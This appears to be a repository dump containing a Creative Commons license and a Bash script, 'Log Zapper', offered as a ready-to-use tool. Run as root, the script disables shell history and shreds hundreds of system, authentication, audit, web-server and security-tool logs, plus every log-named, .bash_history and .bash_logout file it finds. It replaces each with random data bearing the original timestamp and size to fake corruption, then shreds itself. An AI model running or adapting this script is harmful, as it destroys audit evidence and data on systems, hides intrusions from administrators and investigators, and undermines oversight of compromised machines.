├── LICENSE
├── Linux
├── Shapper.sh
└── example.txt
├── README.md
├── Windows
├── Python
│ ├── logzapper.py
│ └── requeriments.txt
└── example.txt
└── images
├── PythonPOC.gif
├── example.gif
└── logo.png
/LICENSE:
--------------------------------------------------------------------------------
1 | bin (c) by Rug4lo_and_yoshl
2 |
3 | Attribution 4.0 International
4 |
5 | =======================================================================
6 |
7 | Creative Commons Corporation ("Creative Commons") is not a law firm and
8 | does not provide legal services or legal advice. Distribution of
9 | Creative Commons public licenses does not create a lawyer-client or
10 | other relationship. Creative Commons makes its licenses and related
11 | information available on an "as-is" basis. Creative Commons gives no
12 | warranties regarding its licenses, any material licensed under their
13 | terms and conditions, or any related information. Creative Commons
14 | disclaims all liability for damages resulting from their use to the
15 | fullest extent possible.
16 |
17 | Using Creative Commons Public Licenses
18 |
19 | Creative Commons public licenses provide a standard set of terms and
20 | conditions that creators and other rights holders may use to share
21 | original works of authorship and other material subject to copyright
22 | and certain other rights specified in the public license below. The
23 | following considerations are for informational purposes only, are not
24 | exhaustive, and do not form part of our licenses.
25 |
26 | Considerations for licensors: Our public licenses are
27 | intended for use by those authorized to give the public
28 | permission to use material in ways otherwise restricted by
29 | copyright and certain other rights. Our licenses are
30 | irrevocable. Licensors should read and understand the terms
31 | and conditions of the license they choose before applying it.
32 | Licensors should also secure all rights necessary before
33 | applying our licenses so that the public can reuse the
34 | material as expected. Licensors should clearly mark any
35 | material not subject to the license. This includes other CC-
36 | licensed material, or material used under an exception or
37 | limitation to copyright. More considerations for licensors:
38 | wiki.creativecommons.org/Considerations_for_licensors
39 |
40 | Considerations for the public: By using one of our public
41 | licenses, a licensor grants the public permission to use the
42 | licensed material under specified terms and conditions. If
43 | the licensor's permission is not necessary for any reason--for
44 | example, because of any applicable exception or limitation to
45 | copyright--then that use is not regulated by the license. Our
46 | licenses grant only permissions under copyright and certain
47 | other rights that a licensor has authority to grant. Use of
48 | the licensed material may still be restricted for other
49 | reasons, including because others have copyright or other
50 | rights in the material. A licensor may make special requests,
51 | such as asking that all changes be marked or described.
52 | Although not required by our licenses, you are encouraged to
53 | respect those requests where reasonable. More_considerations
54 | for the public:
55 | wiki.creativecommons.org/Considerations_for_licensees
56 |
57 | =======================================================================
58 |
59 | Creative Commons Attribution 4.0 International Public License
60 |
61 | By exercising the Licensed Rights (defined below), You accept and agree
62 | to be bound by the terms and conditions of this Creative Commons
63 | Attribution 4.0 International Public License ("Public License"). To the
64 | extent this Public License may be interpreted as a contract, You are
65 | granted the Licensed Rights in consideration of Your acceptance of
66 | these terms and conditions, and the Licensor grants You such rights in
67 | consideration of benefits the Licensor receives from making the
68 | Licensed Material available under these terms and conditions.
69 |
70 |
71 | Section 1 -- Definitions.
72 |
73 | a. Adapted Material means material subject to Copyright and Similar
74 | Rights that is derived from or based upon the Licensed Material
75 | and in which the Licensed Material is translated, altered,
76 | arranged, transformed, or otherwise modified in a manner requiring
77 | permission under the Copyright and Similar Rights held by the
78 | Licensor. For purposes of this Public License, where the Licensed
79 | Material is a musical work, performance, or sound recording,
80 | Adapted Material is always produced where the Licensed Material is
81 | synched in timed relation with a moving image.
82 |
83 | b. Adapter's License means the license You apply to Your Copyright
84 | and Similar Rights in Your contributions to Adapted Material in
85 | accordance with the terms and conditions of this Public License.
86 |
87 | c. Copyright and Similar Rights means copyright and/or similar rights
88 | closely related to copyright including, without limitation,
89 | performance, broadcast, sound recording, and Sui Generis Database
90 | Rights, without regard to how the rights are labeled or
91 | categorized. For purposes of this Public License, the rights
92 | specified in Section 2(b)(1)-(2) are not Copyright and Similar
93 | Rights.
94 |
95 | d. Effective Technological Measures means those measures that, in the
96 | absence of proper authority, may not be circumvented under laws
97 | fulfilling obligations under Article 11 of the WIPO Copyright
98 | Treaty adopted on December 20, 1996, and/or similar international
99 | agreements.
100 |
101 | e. Exceptions and Limitations means fair use, fair dealing, and/or
102 | any other exception or limitation to Copyright and Similar Rights
103 | that applies to Your use of the Licensed Material.
104 |
105 | f. Licensed Material means the artistic or literary work, database,
106 | or other material to which the Licensor applied this Public
107 | License.
108 |
109 | g. Licensed Rights means the rights granted to You subject to the
110 | terms and conditions of this Public License, which are limited to
111 | all Copyright and Similar Rights that apply to Your use of the
112 | Licensed Material and that the Licensor has authority to license.
113 |
114 | h. Licensor means the individual(s) or entity(ies) granting rights
115 | under this Public License.
116 |
117 | i. Share means to provide material to the public by any means or
118 | process that requires permission under the Licensed Rights, such
119 | as reproduction, public display, public performance, distribution,
120 | dissemination, communication, or importation, and to make material
121 | available to the public including in ways that members of the
122 | public may access the material from a place and at a time
123 | individually chosen by them.
124 |
125 | j. Sui Generis Database Rights means rights other than copyright
126 | resulting from Directive 96/9/EC of the European Parliament and of
127 | the Council of 11 March 1996 on the legal protection of databases,
128 | as amended and/or succeeded, as well as other essentially
129 | equivalent rights anywhere in the world.
130 |
131 | k. You means the individual or entity exercising the Licensed Rights
132 | under this Public License. Your has a corresponding meaning.
133 |
134 |
135 | Section 2 -- Scope.
136 |
137 | a. License grant.
138 |
139 | 1. Subject to the terms and conditions of this Public License,
140 | the Licensor hereby grants You a worldwide, royalty-free,
141 | non-sublicensable, non-exclusive, irrevocable license to
142 | exercise the Licensed Rights in the Licensed Material to:
143 |
144 | a. reproduce and Share the Licensed Material, in whole or
145 | in part; and
146 |
147 | b. produce, reproduce, and Share Adapted Material.
148 |
149 | 2. Exceptions and Limitations. For the avoidance of doubt, where
150 | Exceptions and Limitations apply to Your use, this Public
151 | License does not apply, and You do not need to comply with
152 | its terms and conditions.
153 |
154 | 3. Term. The term of this Public License is specified in Section
155 | 6(a).
156 |
157 | 4. Media and formats; technical modifications allowed. The
158 | Licensor authorizes You to exercise the Licensed Rights in
159 | all media and formats whether now known or hereafter created,
160 | and to make technical modifications necessary to do so. The
161 | Licensor waives and/or agrees not to assert any right or
162 | authority to forbid You from making technical modifications
163 | necessary to exercise the Licensed Rights, including
164 | technical modifications necessary to circumvent Effective
165 | Technological Measures. For purposes of this Public License,
166 | simply making modifications authorized by this Section 2(a)
167 | (4) never produces Adapted Material.
168 |
169 | 5. Downstream recipients.
170 |
171 | a. Offer from the Licensor -- Licensed Material. Every
172 | recipient of the Licensed Material automatically
173 | receives an offer from the Licensor to exercise the
174 | Licensed Rights under the terms and conditions of this
175 | Public License.
176 |
177 | b. No downstream restrictions. You may not offer or impose
178 | any additional or different terms or conditions on, or
179 | apply any Effective Technological Measures to, the
180 | Licensed Material if doing so restricts exercise of the
181 | Licensed Rights by any recipient of the Licensed
182 | Material.
183 |
184 | 6. No endorsement. Nothing in this Public License constitutes or
185 | may be construed as permission to assert or imply that You
186 | are, or that Your use of the Licensed Material is, connected
187 | with, or sponsored, endorsed, or granted official status by,
188 | the Licensor or others designated to receive attribution as
189 | provided in Section 3(a)(1)(A)(i).
190 |
191 | b. Other rights.
192 |
193 | 1. Moral rights, such as the right of integrity, are not
194 | licensed under this Public License, nor are publicity,
195 | privacy, and/or other similar personality rights; however, to
196 | the extent possible, the Licensor waives and/or agrees not to
197 | assert any such rights held by the Licensor to the limited
198 | extent necessary to allow You to exercise the Licensed
199 | Rights, but not otherwise.
200 |
201 | 2. Patent and trademark rights are not licensed under this
202 | Public License.
203 |
204 | 3. To the extent possible, the Licensor waives any right to
205 | collect royalties from You for the exercise of the Licensed
206 | Rights, whether directly or through a collecting society
207 | under any voluntary or waivable statutory or compulsory
208 | licensing scheme. In all other cases the Licensor expressly
209 | reserves any right to collect such royalties.
210 |
211 |
212 | Section 3 -- License Conditions.
213 |
214 | Your exercise of the Licensed Rights is expressly made subject to the
215 | following conditions.
216 |
217 | a. Attribution.
218 |
219 | 1. If You Share the Licensed Material (including in modified
220 | form), You must:
221 |
222 | a. retain the following if it is supplied by the Licensor
223 | with the Licensed Material:
224 |
225 | i. identification of the creator(s) of the Licensed
226 | Material and any others designated to receive
227 | attribution, in any reasonable manner requested by
228 | the Licensor (including by pseudonym if
229 | designated);
230 |
231 | ii. a copyright notice;
232 |
233 | iii. a notice that refers to this Public License;
234 |
235 | iv. a notice that refers to the disclaimer of
236 | warranties;
237 |
238 | v. a URI or hyperlink to the Licensed Material to the
239 | extent reasonably practicable;
240 |
241 | b. indicate if You modified the Licensed Material and
242 | retain an indication of any previous modifications; and
243 |
244 | c. indicate the Licensed Material is licensed under this
245 | Public License, and include the text of, or the URI or
246 | hyperlink to, this Public License.
247 |
248 | 2. You may satisfy the conditions in Section 3(a)(1) in any
249 | reasonable manner based on the medium, means, and context in
250 | which You Share the Licensed Material. For example, it may be
251 | reasonable to satisfy the conditions by providing a URI or
252 | hyperlink to a resource that includes the required
253 | information.
254 |
255 | 3. If requested by the Licensor, You must remove any of the
256 | information required by Section 3(a)(1)(A) to the extent
257 | reasonably practicable.
258 |
259 | 4. If You Share Adapted Material You produce, the Adapter's
260 | License You apply must not prevent recipients of the Adapted
261 | Material from complying with this Public License.
262 |
263 |
264 | Section 4 -- Sui Generis Database Rights.
265 |
266 | Where the Licensed Rights include Sui Generis Database Rights that
267 | apply to Your use of the Licensed Material:
268 |
269 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right
270 | to extract, reuse, reproduce, and Share all or a substantial
271 | portion of the contents of the database;
272 |
273 | b. if You include all or a substantial portion of the database
274 | contents in a database in which You have Sui Generis Database
275 | Rights, then the database in which You have Sui Generis Database
276 | Rights (but not its individual contents) is Adapted Material; and
277 |
278 | c. You must comply with the conditions in Section 3(a) if You Share
279 | all or a substantial portion of the contents of the database.
280 |
281 | For the avoidance of doubt, this Section 4 supplements and does not
282 | replace Your obligations under this Public License where the Licensed
283 | Rights include other Copyright and Similar Rights.
284 |
285 |
286 | Section 5 -- Disclaimer of Warranties and Limitation of Liability.
287 |
288 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
289 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
290 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
291 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
292 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
293 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
294 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
295 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
296 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
297 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
298 |
299 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
300 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
301 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
302 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
303 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
304 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
305 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
306 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
307 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
308 |
309 | c. The disclaimer of warranties and limitation of liability provided
310 | above shall be interpreted in a manner that, to the extent
311 | possible, most closely approximates an absolute disclaimer and
312 | waiver of all liability.
313 |
314 |
315 | Section 6 -- Term and Termination.
316 |
317 | a. This Public License applies for the term of the Copyright and
318 | Similar Rights licensed here. However, if You fail to comply with
319 | this Public License, then Your rights under this Public License
320 | terminate automatically.
321 |
322 | b. Where Your right to use the Licensed Material has terminated under
323 | Section 6(a), it reinstates:
324 |
325 | 1. automatically as of the date the violation is cured, provided
326 | it is cured within 30 days of Your discovery of the
327 | violation; or
328 |
329 | 2. upon express reinstatement by the Licensor.
330 |
331 | For the avoidance of doubt, this Section 6(b) does not affect any
332 | right the Licensor may have to seek remedies for Your violations
333 | of this Public License.
334 |
335 | c. For the avoidance of doubt, the Licensor may also offer the
336 | Licensed Material under separate terms or conditions or stop
337 | distributing the Licensed Material at any time; however, doing so
338 | will not terminate this Public License.
339 |
340 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
341 | License.
342 |
343 |
344 | Section 7 -- Other Terms and Conditions.
345 |
346 | a. The Licensor shall not be bound by any additional or different
347 | terms or conditions communicated by You unless expressly agreed.
348 |
349 | b. Any arrangements, understandings, or agreements regarding the
350 | Licensed Material not stated herein are separate from and
351 | independent of the terms and conditions of this Public License.
352 |
353 |
354 | Section 8 -- Interpretation.
355 |
356 | a. For the avoidance of doubt, this Public License does not, and
357 | shall not be interpreted to, reduce, limit, restrict, or impose
358 | conditions on any use of the Licensed Material that could lawfully
359 | be made without permission under this Public License.
360 |
361 | b. To the extent possible, if any provision of this Public License is
362 | deemed unenforceable, it shall be automatically reformed to the
363 | minimum extent necessary to make it enforceable. If the provision
364 | cannot be reformed, it shall be severed from this Public License
365 | without affecting the enforceability of the remaining terms and
366 | conditions.
367 |
368 | c. No term or condition of this Public License will be waived and no
369 | failure to comply consented to unless expressly agreed to by the
370 | Licensor.
371 |
372 | d. Nothing in this Public License constitutes or may be interpreted
373 | as a limitation upon, or waiver of, any privileges and immunities
374 | that apply to the Licensor or You, including from the legal
375 | processes of any jurisdiction or authority.
376 |
377 |
378 | =======================================================================
379 |
380 | Creative Commons is not a party to its public licenses.
381 | Notwithstanding, Creative Commons may elect to apply one of its public
382 | licenses to material it publishes and in those instances will be
383 | considered the "Licensor." Except for the limited purpose of indicating
384 | that material is shared under a Creative Commons public license or as
385 | otherwise permitted by the Creative Commons policies published at
386 | creativecommons.org/policies, Creative Commons does not authorize the
387 | use of the trademark "Creative Commons" or any other trademark or logo
388 | of Creative Commons without its prior written consent including,
389 | without limitation, in connection with any unauthorized modifications
390 | to any of its public licenses or any other arrangements,
391 | understandings, or agreements concerning use of licensed material. For
392 | the avoidance of doubt, this paragraph does not form part of the public
393 | licenses.
394 |
395 | Creative Commons may be contacted at creativecommons.org.
396 |
--------------------------------------------------------------------------------
/Linux/Shapper.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Verifica si el script está siendo ejecutado como root
4 | if [ "$UID" -ne 0 ]; then
5 | echo "Este script debe ser ejecutado como root."
6 | exit 1
7 | fi
8 |
9 | # Colors
10 |
11 | greenColour="\e[0;32m\033[1m"
12 | endColour="\033[0m\e[0m"
13 | redColour="\e[0;31m\033[1m"
14 | turquoiseColour="\e[0;36m\033[1m"
15 |
16 | # Intro
17 |
18 | echo -e "\n\n ╔══════════════════════════════════════════════════╗"
19 | echo -e "╔═╝ ╚═╗"
20 | echo -e "║ ${turquoiseColour}Log Zapper: A Secure Zapper For Logs${endColour} ║"
21 | echo -e "╚═╗ ╔═╝"
22 | echo -e " ╚══════════════════════════════════════════════════╝ "
23 | echo -e "\n ${greenColour}By${endColour} Rug4lo and yoshl"
24 |
25 | # Reset configuration of syslogd daemon
26 |
27 | echo -e "\n\n${greenColour}[+] ${endColour}Reseting configuration of syslogd daemon"
28 |
29 | killall -HUP syslogd &>/dev/null
30 | echo -e " ~ Reset complete"
31 |
32 | # Remove of the Environment Variables
33 |
34 | echo -e "\n${greenColour}[+] ${endColour}Removing of the Environment Variables"
35 |
36 | unset HISTFILE
37 | unset SAVEHIST
38 | export HISTFILE=/dev/null
39 | export SAVEHIST=/dev/null
40 | echo -e " ~ Remove complete"
41 |
42 | # Creating data for Gutmann Secuence
43 |
44 | generate_random_data() {
45 | head -c 3 /dev/urandom
46 | }
47 |
48 | data=(
49 | "$(generate_random_data)"
50 | "$(generate_random_data)"
51 | "$(generate_random_data)"
52 | "$(generate_random_data)"
53 | '\x55'
54 | '\xAA'
55 | '\x92\x49\x24'
56 | '\x49\x24\x92'
57 | '\x24\x92\x49'
58 | '\x00'
59 | '\x11'
60 | '\x22'
61 | '\x33'
62 | '\x44'
63 | '\x55'
64 | '\x66'
65 | '\x77'
66 | '\x88'
67 | '\x99'
68 | '\xAA'
69 | '\xBB'
70 | '\xCC'
71 | '\xEE'
72 | '\xFF'
73 | '\x92\x49\x24'
74 | '\x49\x24\x92'
75 | '\x24\x92\x49'
76 | '\x6D\x86\xD8'
77 | '\xD6\xDB\x6D'
78 | '\xDB\x6D\xB6'
79 | "$(generate_random_data)"
80 | "$(generate_random_data)"
81 | "$(generate_random_data)"
82 | "$(generate_random_data)"
83 | )
84 |
85 | # Clean common log files
86 |
87 | echo -e "\n${greenColour}[+] ${endColour}Deleting common log files"
88 |
89 | common_logs=(
90 | "/etc/httpd/logs/access_log"
91 | "/etc/httpd/logs/error_log"
92 | "/etc/lastlog"
93 | "/etc/mail/access"
94 | "/etc/utmp"
95 | "/etc/utmpx"
96 | "/etc/wtmp"
97 | "/etc/wtmpx"
98 | "/root/.Xauthority"
99 | "/root/.bash_history"
100 | "/root/.bash_logout"
101 | "/root/.bash_logut"
102 | "/root/.cshrc"
103 | "/root/.ksh_history"
104 | "/root/.tcshrc"
105 | "/tmp"
106 | "/tmp/logs"
107 | "/usr/adm/lastlog"
108 | "/usr/adm/utmp"
109 | "/usr/adm/utmpx"
110 | "/usr/adm/wtmp"
111 | "/usr/adm/wtmpx"
112 | "/usr/local/apache/log"
113 | "/usr/local/apache/logs"
114 | "/usr/local/www/logs/thttpd_log"
115 | "/var/account/acct"
116 | "/var/adm"
117 | "/var/adm/lastlog"
118 | "/var/adm/pacct"
119 | "/var/adm/ssh.log"
120 | "/var/adm/utmp"
121 | "/var/adm/utmpx"
122 | "/var/adm/wtmp"
123 | "/var/adm/wtmpx"
124 | "/var/apache/log"
125 | "/var/apache/logs"
126 | "/var/httpd/logs/ssl.log"
127 | "/var/lock/samba"
128 | "/var/log"
129 | "/var/log/Xorg"
130 | "/var/log/Xorg.0.log"
131 | "/var/log/acct"
132 | "/var/log/alerts.log"
133 | "/var/log/alternatives"
134 | "/var/log/alternatives.log"
135 | "/var/log/apache2/acces.log"
136 | "/var/log/apache2/acces.log1"
137 | "/var/log/apache2/access.log"
138 | "/var/log/apache2/error.log"
139 | "/var/log/apt/history.log"
140 | "/var/log/apt/term.log"
141 | "/var/log/audit/audit.log"
142 | "/var/log/auth"
143 | "/var/log/auth.log"
144 | "/var/log/boot.log"
145 | "/var/log/btmp"
146 | "/var/log/cgi.log"
147 | "/var/log/clamav/clamav.log"
148 | "/var/log/cron"
149 | "/var/log/cron.log"
150 | "/var/log/cups"
151 | "/var/log/daemon"
152 | "/var/log/daemon.log"
153 | "/var/log/dmesg"
154 | "/var/log/dpkg"
155 | "/var/log/dpkg.log"
156 | "/var/log/daemon.log"
157 | "/var/log/fail2ban.log"
158 | "/var/log/faillog"
159 | "/var/log/httpd/access_log"
160 | "/var/log/httpd/error_log"
161 | "/var/log/httpsd/ssl.access_log"
162 | "/var/log/httpsd/ssl_log"
163 | "/var/log/kern"
164 | "/var/log/kern.log"
165 | "/var/log/lastlog"
166 | "/var/log/lighttpd/access.log"
167 | "/var/log/lighttpd/error.log"
168 | "/var/log/loginlog"
169 | "/var/log/logname"
170 | "/var/log/lpr.log"
171 | "/var/log/mail.err"
172 | "/var/log/mail.log"
173 | "/var/log/mail.warn"
174 | "/var/log/maillog"
175 | "/var/log/mariadb/mariadb-error.log"
176 | "/var/log/mariadb/mariadb.log"
177 | "/var/log/memcached.log"
178 | "/var/log/messages"
179 | "/var/log/messages/"
180 | "/var/log/mongodb/mongod.log"
181 | "/var/log/mysql/error.log"
182 | "/var/log/ncftpd.errs"
183 | "/var/log/ncftpd/misclog.txt"
184 | "/var/log/nctfpd.errs"
185 | "/var/log/news"
186 | "/var/log/news.all"
187 | "/var/log/news/news"
188 | "/var/log/news/news.all"
189 | "/var/log/news/news.crit"
190 | "/var/log/news/news.err"
191 | "/var/log/news/news.notice"
192 | "/var/log/news/suck.err"
193 | "/var/log/news/suck.notice"
194 | "/var/log/nginx/php_error.log"
195 | "/var/log/pacct"
196 | "/var/log/pacman.log"
197 | "/var/log/pureftp.log"
198 | "/var/log/poplog"
199 | "/var/log/portage/elog/summary.log"
200 | "/var/log/proftpd.access_log"
201 | "/var/log/proftpd.xferlog"
202 | "/var/log/proftpd/xferlog.legacy"
203 | "/var/log/qmail"
204 | "/var/log/redis/redis-server.log"
205 | "/var/log/rkhunter.log"
206 | "/var/log/samba"
207 | "/var/log/samba-log.%m"
208 | "/var/log/samba.log.%m"
209 | "/var/log/samba/log.nmbd"
210 | "/var/log/samba/log.smbd"
211 | "/var/log/secure"
212 | "/var/log/secure.log"
213 | "/var/log/sendmail.log"
214 | "/var/log/smartd.log"
215 | "/var/log/smtpd"
216 | "/var/log/spooler"
217 | "/var/log/squid/access.log"
218 | "/var/log/ssh.log"
219 | "/var/log/syslog"
220 | "/var/log/syslog.log"
221 | "/var/log/telnetd"
222 | "/var/log/tftp.log"
223 | "/var/log/thttpd_log"
224 | "/var/log/ufw.log"
225 | "/var/log/user"
226 | "/var/log/user.log"
227 | "/var/log/utmp"
228 | "/var/log/utmpx"
229 | "/var/log/vsftpd.log"
230 | "/var/log/wtmp"
231 | "/var/log/wtmpx"
232 | "/var/log/xferlog"
233 | "/var/log/yum.log"
234 | "/var/logs"
235 | "/var/run/utmp"
236 | "/var/run/utmpx"
237 | "/var/spool/errors"
238 | "/var/spool/locks"
239 | "/var/spool/logs"
240 | "/var/spool/tmp"
241 | "/usr/local/psa/admin/logs/httpsd_access_log"
242 |
243 | )
244 |
245 | for path in "${common_logs[@]}"; do
246 |
247 | # Check if path exists
248 | if [ -f "$path" ]; then
249 |
250 | # Saving date and size of the file
251 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
252 | time=$(date -r $path +"%Y%m%d%H%M.%S")
253 |
254 | # Overwriting data with Gutmann Secuence
255 | for pattern in "${data[@]}"; do
256 |
257 | length=$(printf "%s" "$pattern" | wc -c)
258 | if [ $length -eq 1 ]; then
259 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
260 | else
261 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
262 | fi
263 | done
264 |
265 | # Overwriting and Deleting with shred
266 | shred -n 4 -v $path &>/dev/null
267 | head -c $bytes /dev/urandom > $path
268 | cp /dev/null $path 2>/dev/null
269 | shred -zun 7 -v $path &>/dev/null
270 |
271 | # Creating fake corrupted file with same date and size as original
272 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
273 |
274 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
275 | fi
276 | done
277 |
278 | sync
279 |
280 | # Clean .log files
281 |
282 | echo -e "\n${greenColour}[+] ${endColour}Cleaning .log files"
283 |
284 | log1=$(find / -name "*.log" 2>/dev/null)
285 |
286 | for path in $log1; do
287 |
288 | # Saving date and size of the file
289 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
290 | time=$(date -r $path +"%Y%m%d%H%M.%S")
291 |
292 | # Overwriting data with Gutmann Secuence
293 | for pattern in "${data[@]}"; do
294 |
295 | length=$(printf "%s" "$pattern" | wc -c)
296 | if [ $length -eq 1 ]; then
297 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
298 | else
299 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
300 | fi
301 | done
302 |
303 | # Overwriting and Deleting with shred
304 | shred -n 4 -v $path &>/dev/null
305 | head -c $bytes /dev/urandom > $path
306 | cp /dev/null $path 2>/dev/null
307 | shred -zun 7 -v $path &>/dev/null
308 |
309 | # Creating fake corrupted file with same date and size as original
310 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
311 |
312 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
313 | done
314 |
315 | sync
316 |
317 | # Clean .log.* files (usualy backups of the logs)
318 |
319 | echo -e "\n${greenColour}[+] ${endColour}Cleaning backups of log files"
320 |
321 | log1=$(find / -name "*.log.*" 2>/dev/null)
322 |
323 | for path in $log1; do
324 |
325 | # Saving date and size of the file
326 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
327 | time=$(date -r $path +"%Y%m%d%H%M.%S")
328 |
329 | # Overwriting data with Gutmann Secuence
330 | for pattern in "${data[@]}"; do
331 |
332 | length=$(printf "%s" "$pattern" | wc -c)
333 | if [ $length -eq 1 ]; then
334 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
335 | else
336 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
337 | fi
338 | done
339 |
340 | # Overwriting and Deleting with shred
341 | shred -n 4 -v $path &>/dev/null
342 | head -c $bytes /dev/urandom > $path
343 | cp /dev/null $path 2>/dev/null
344 | shred -zun 7 -v $path &>/dev/null
345 |
346 | # Creating fake corrupted file with same date and size as original
347 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
348 |
349 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
350 | done
351 |
352 | sync
353 |
354 | # Clean .log_old files
355 |
356 | echo -e "\n${greenColour}[+] ${endColour}Cleaning old log files"
357 |
358 | log1=$(find / -name "*.log_old" 2>/dev/null)
359 |
360 | for path in $log1; do
361 |
362 | # Saving date and size of the file
363 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
364 | time=$(date -r $path +"%Y%m%d%H%M.%S")
365 |
366 | # Overwriting data with Gutmann Secuence
367 | for pattern in "${data[@]}"; do
368 |
369 | length=$(printf "%s" "$pattern" | wc -c)
370 | if [ $length -eq 1 ]; then
371 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
372 | else
373 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
374 | fi
375 | done
376 |
377 | # Overwriting and Deleting with shred
378 | shred -n 4 -v $path &>/dev/null
379 | head -c $bytes /dev/urandom > $path
380 | cp /dev/null $path 2>/dev/null
381 | shred -zun 7 -v $path &>/dev/null
382 |
383 | # Creating fake corrupted file with same date and size as original
384 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
385 |
386 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
387 | done
388 |
389 | sync
390 |
391 | # Clean *log files
392 |
393 | echo -e "\n${greenColour}[+] ${endColour}Cleaning other log files"
394 |
395 | log2=$(find / -name "log*" -type f 2>/dev/null)
396 |
397 | for path in $log2; do
398 |
399 | # Overwriting and Deleting with shred
400 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
401 | cp /dev/null $path 2>/dev/null
402 | shred -zun 7 -v $path &>/dev/null
403 |
404 | done
405 |
406 | sync
407 | echo -e " ~ Remove complete"
408 |
409 | # Clean *.bash_logout files
410 |
411 | echo -e "\n${greenColour}[+] ${endColour}Cleaning every .bash_logout"
412 |
413 | bash_logout=$(find / -name "*.bash_logout" 2>/dev/null)
414 |
415 | for path in $bash_logout; do
416 |
417 | # Saving date and size of the file
418 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
419 | time=$(date -r $path +"%Y%m%d%H%M.%S")
420 |
421 | # Overwriting data with Gutmann Secuence
422 |
423 | for pattern in "${data[@]}"; do
424 |
425 | length=$(printf "%s" "$pattern" | wc -c)
426 | if [ $length -eq 1 ]; then
427 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
428 | else
429 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
430 | fi
431 | done
432 |
433 | # Overwriting and Deleting with shred
434 | shred -n 4 -v $path &>/dev/null
435 | head -c $bytes /dev/urandom > $path
436 | cp /dev/null $path 2>/dev/null
437 | shred -zun 7 -v $path &>/dev/null
438 |
439 | # Creating fake corrupted file with same date and size as original
440 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
441 |
442 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
443 | done
444 |
445 | sync
446 |
447 | # Clean *.bash_history files
448 |
449 | echo -e "\n${greenColour}[+] ${endColour}Cleaning every .bash_history"
450 |
451 | bash_history=$(find / -name "*.bash_history" 2>/dev/null)
452 |
453 | for path in $bash_history; do
454 |
455 | # Saving date and size of the file
456 | bytes=$(du -b $path 2>/dev/null | awk '{print $1}')
457 | time=$(date -r $path +"%Y%m%d%H%M.%S")
458 |
459 | # Overwriting data with Gutmann Secuence
460 |
461 | for pattern in "${data[@]}"; do
462 |
463 | length=$(printf "%s" "$pattern" | wc -c)
464 | if [ $length -eq 1 ]; then
465 | printf "$(yes "$pattern" | head -n 21845 | tr -d '\n')" >> "$path"
466 | else
467 | printf "$(yes "$pattern" | head -n 65536 | tr -d '\n')" >> "$path"
468 | fi
469 | done
470 |
471 | # Overwriting and Deleting with shred
472 | shred -n 4 -v $path &>/dev/null
473 | head -c $bytes /dev/urandom > $path
474 | cp /dev/null $path 2>/dev/null
475 | shred -zun 7 -v $path &>/dev/null
476 |
477 | # Creating fake corrupted file with same date and size as original
478 | head -c $bytes /dev/urandom > $path && touch -t "$time" $path
479 |
480 | echo -e " ~ Removing the log file: ${redColour}$path${endColour}"
481 | done
482 |
483 | sync
484 |
485 | # Delete comand History
486 |
487 | echo -e "\n${greenColour}[+] ${endColour}Erasing the command History"
488 |
489 | history -c
490 | echo -e " ~ Erase complete"
491 |
492 | echo -e "\n${redColour}[!]${endColour} This script will be deleted, Thanks for using it!\n"
493 |
494 | sync
495 |
496 | # Delete this code
497 |
498 | shred -zun 15 -v $0 &>/dev/null
499 |
--------------------------------------------------------------------------------
